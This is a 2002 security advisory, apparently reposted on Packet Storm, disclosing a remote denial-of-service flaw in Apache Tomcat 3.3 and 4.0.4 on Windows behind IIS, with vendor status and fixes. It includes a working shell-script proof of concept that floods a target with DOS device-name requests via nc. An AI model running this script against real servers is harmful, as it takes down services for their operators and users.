Apache Tomcat 3.3 and 4.0.4 for Windows NT and 2000 remote denial of service exploit. Uses device names like AUX, LPT1, CON, and PRN to crash the server.
d350ab2f1f17570561020752a2d24d68-----BEGIN PGP SIGNED MESSAGE-----
<Title:>
Apache Tomcat: Remote denial-of-service vulnerability
<Date:>
2002-09-06
<State:>
2002-10-11
<Vendor response:>
Vendor contacted on 2002-09-06.
Vendor is verifying the problem since 2002-09-10.
No news since then...
<Operating Systems:>
Microsoft Windows 2000
Microsoft Windows NT may be affected as well.
<Software:>
Apache Tomcat 3.3
Apache Tomcat 4.0.4
All versions prior to 4.1.x may be affected as well.
Apache Tomcat 4.1.10 (and probably higher) is not affected.
<Attack:>
A remote attacker can bring the servlet engine to a standstill.
<Description:>
In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
denial-of-service attack.
An attacker can crash the tomcat engine with multiple (e.g. 1000)
requests that contain DOS device names like AUX, LPT1, CON, PRN.
Proof of concept code:
When Tomcat is serving servlets and jsp's under /examples/servlet/,
use
:-
- - - - --------8<----------------------------
#!/bin/sh
for i in 1 2 3 4 5 6 7 8 9 0 ; do
for j in 1 2 3 4 5 6 7 8 9 0 ; do
for k in 1 2 3 4 5 6 7 8 9 0 ; do
echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n"|nc
<target_ip>
<target-port> 2>1 >/dev/null &
done
done
done
- - - - --------8<----------------------------
This attack works on a Microsoft IIS Web Server connecting the Tomcat
engine via the ajp1.3 connector.
Standalone Tomcat engines (connected via the http interface on port
8080) are not vulnerable.
<Risc:>
Probability of an attack: HIGH
Damage probability: MEDIUM-HIGH
<Recommendation:>
1) Do not use Apache software on Microsoft operating systems.
2) When using Apache with IIS, enable the URLScan Filter to filter
DOS
device names from HTTP Requests.
3) Update to Apache Tomcat 4.1.x
Author: Olaf Schulz
olaf.schulz@t-systems.com
http://www.dcert.de
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3
iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf
dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b
tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o
fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK
YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7
0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ==
=+2dL
-----END PGP SIGNATURE-----
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!